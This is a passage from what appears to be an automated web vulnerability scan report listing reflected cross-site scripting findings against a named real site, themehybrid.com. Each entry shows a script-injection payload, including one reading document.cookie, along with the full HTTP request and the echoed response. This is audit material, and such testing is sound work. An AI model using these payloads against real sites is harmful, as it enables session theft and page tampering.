Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:17 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:18 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/plugins/cleaner-gallerye5ec4\"><script>alert(1)</script>624a982d9fe/cleaner-gallery.css?ver=0.7"/>
...[SNIP]...

4.384. http://themehybrid.com/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1689c"><script>alert(1)</script>f7596597b83 was submitted in the REST URL parameter 5. This input was echoed as 1689c\"><script>alert(1)</script>f7596597b83 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css1689c"><script>alert(1)</script>f7596597b83?ver=0.7 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:58 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:53:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10444

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/plugins/cleaner-gallery/cleaner-gallery.css1689c\"><script>alert(1)</script>f7596597b83?ver=0.7"/>
...[SNIP]...

4.385. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44c92"><script>alert(1)</script>16b4b6cb96f was submitted in the REST URL parameter 1. This input was echoed as 44c92\"><script>alert(1)</script>16b4b6cb96f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog44c92"><script>alert(1)</script>16b4b6cb96f/wp-content/themes/fusion/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:26 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:26 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog44c92\"><script>alert(1)</script>16b4b6cb96f/wp-content/themes/fusion/library/js/fusion.jquery.js"/>
...[SNIP]...

4.386. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1892d"><script>alert(1)</script>bfb5b3a776f was submitted in the REST URL parameter 2. This input was echoed as 1892d\"><script>alert(1)</script>bfb5b3a776f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content1892d"><script>alert(1)</script>bfb5b3a776f/themes/fusion/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:00 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content1892d\"><script>alert(1)</script>bfb5b3a776f/themes/fusion/library/js/fusion.jquery.js"/>
...[SNIP]...

4.387. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70cb0"><script>alert(1)</script>21f3c2085ee was submitted in the REST URL parameter 3. This input was echoed as 70cb0\"><script>alert(1)</script>21f3c2085ee in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes70cb0"><script>alert(1)</script>21f3c2085ee/fusion/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:41 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:43 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes70cb0\"><script>alert(1)</script>21f3c2085ee/fusion/library/js/fusion.jquery.js"/>
...[SNIP]...

4.388. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc3d1"><script>alert(1)</script>cbb2a7067b2 was submitted in the REST URL parameter 4. This input was echoed as dc3d1\"><script>alert(1)</script>cbb2a7067b2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusiondc3d1"><script>alert(1)</script>cbb2a7067b2/library/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:53:19 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:53:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusiondc3d1\"><script>alert(1)</script>cbb2a7067b2/library/js/fusion.jquery.js"/>
...[SNIP]...

4.389. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a71bc"><script>alert(1)</script>e96dadf10f4 was submitted in the REST URL parameter 5. This input was echoed as a71bc\"><script>alert(1)</script>e96dadf10f4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/librarya71bc"><script>alert(1)</script>e96dadf10f4/js/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:53:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:54:00 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/librarya71bc\"><script>alert(1)</script>e96dadf10f4/js/fusion.jquery.js"/>
...[SNIP]...

4.390. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 689ab"><script>alert(1)</script>a0f3a1c2da4 was submitted in the REST URL parameter 6. This input was echoed as 689ab\"><script>alert(1)</script>a0f3a1c2da4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/library/js689ab"><script>alert(1)</script>a0f3a1c2da4/fusion.jquery.js HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:54:34 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:54:35 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/library/js689ab\"><script>alert(1)</script>a0f3a1c2da4/fusion.jquery.js"/>
...[SNIP]...

4.391. http://themehybrid.com/blog/wp-content/themes/fusion/library/js/fusion.jquery.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/library/js/fusion.jquery.js

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6a78"><script>alert(1)</script>18edf7c2b84 was submitted in the REST URL parameter 7. This input was echoed as e6a78\"><script>alert(1)</script>18edf7c2b84 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion/library/js/fusion.jquery.jse6a78"><script>alert(1)</script>18edf7c2b84 HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d; __utmz=87023965.1295921862.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/53; __utma=87023965.1580775653.1295921862.1295921862.1295921862.1; __utmc=87023965; __utmb=87023965.1.10.1295921862

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:55:10 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:55:11 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10424

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion/library/js/fusion.jquery.jse6a78\"><script>alert(1)</script>18edf7c2b84"/>
...[SNIP]...

4.392. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1ee8"><script>alert(1)</script>ad40290be13 was submitted in the REST URL parameter 1. This input was echoed as d1ee8\"><script>alert(1)</script>ad40290be13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blogd1ee8"><script>alert(1)</script>ad40290be13/wp-content/themes/fusion/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:29 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:50:30 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blogd1ee8\"><script>alert(1)</script>ad40290be13/wp-content/themes/fusion/style.css"/>
...[SNIP]...

4.393. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9113"><script>alert(1)</script>8e9a7fe5ccf was submitted in the REST URL parameter 2. This input was echoed as a9113\"><script>alert(1)</script>8e9a7fe5ccf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-contenta9113"><script>alert(1)</script>8e9a7fe5ccf/themes/fusion/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:50:59 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-contenta9113\"><script>alert(1)</script>8e9a7fe5ccf/themes/fusion/style.css"/>
...[SNIP]...

4.394. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41f8a"><script>alert(1)</script>2831b1c5c4c was submitted in the REST URL parameter 3. This input was echoed as 41f8a\"><script>alert(1)</script>2831b1c5c4c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes41f8a"><script>alert(1)</script>2831b1c5c4c/fusion/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:51:31 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:51:32 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes41f8a\"><script>alert(1)</script>2831b1c5c4c/fusion/style.css"/>
...[SNIP]...

4.395. http://themehybrid.com/blog/wp-content/themes/fusion/style.css [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://themehybrid.com
Path:   /blog/wp-content/themes/fusion/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a60"><script>alert(1)</script>f2f57b9d531 was submitted in the REST URL parameter 4. This input was echoed as 62a60\"><script>alert(1)</script>f2f57b9d531 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog/wp-content/themes/fusion62a60"><script>alert(1)</script>f2f57b9d531/style.css HTTP/1.1
Host: themehybrid.com
Proxy-Connection: keep-alive
Referer: http://themehybrid.com/themes/shadow724f1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ef58e6876aa
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=a6bd0f3ad3b5196fc368b021463f882d

Response

HTTP/1.1 404 Not found
Date: Tue, 25 Jan 2011 02:52:01 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
X-Pingback: http://themehybrid.com/blog/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Tue, 25 Jan 2011 02:52:03 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 10388

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr
...[SNIP]...
<input type="hidden" name="redirect_to" value="/blog/wp-content/themes/fusion62a60\"><script>alert(1)</script>f2f57b9d531/style.css"/>
...[SNIP]...

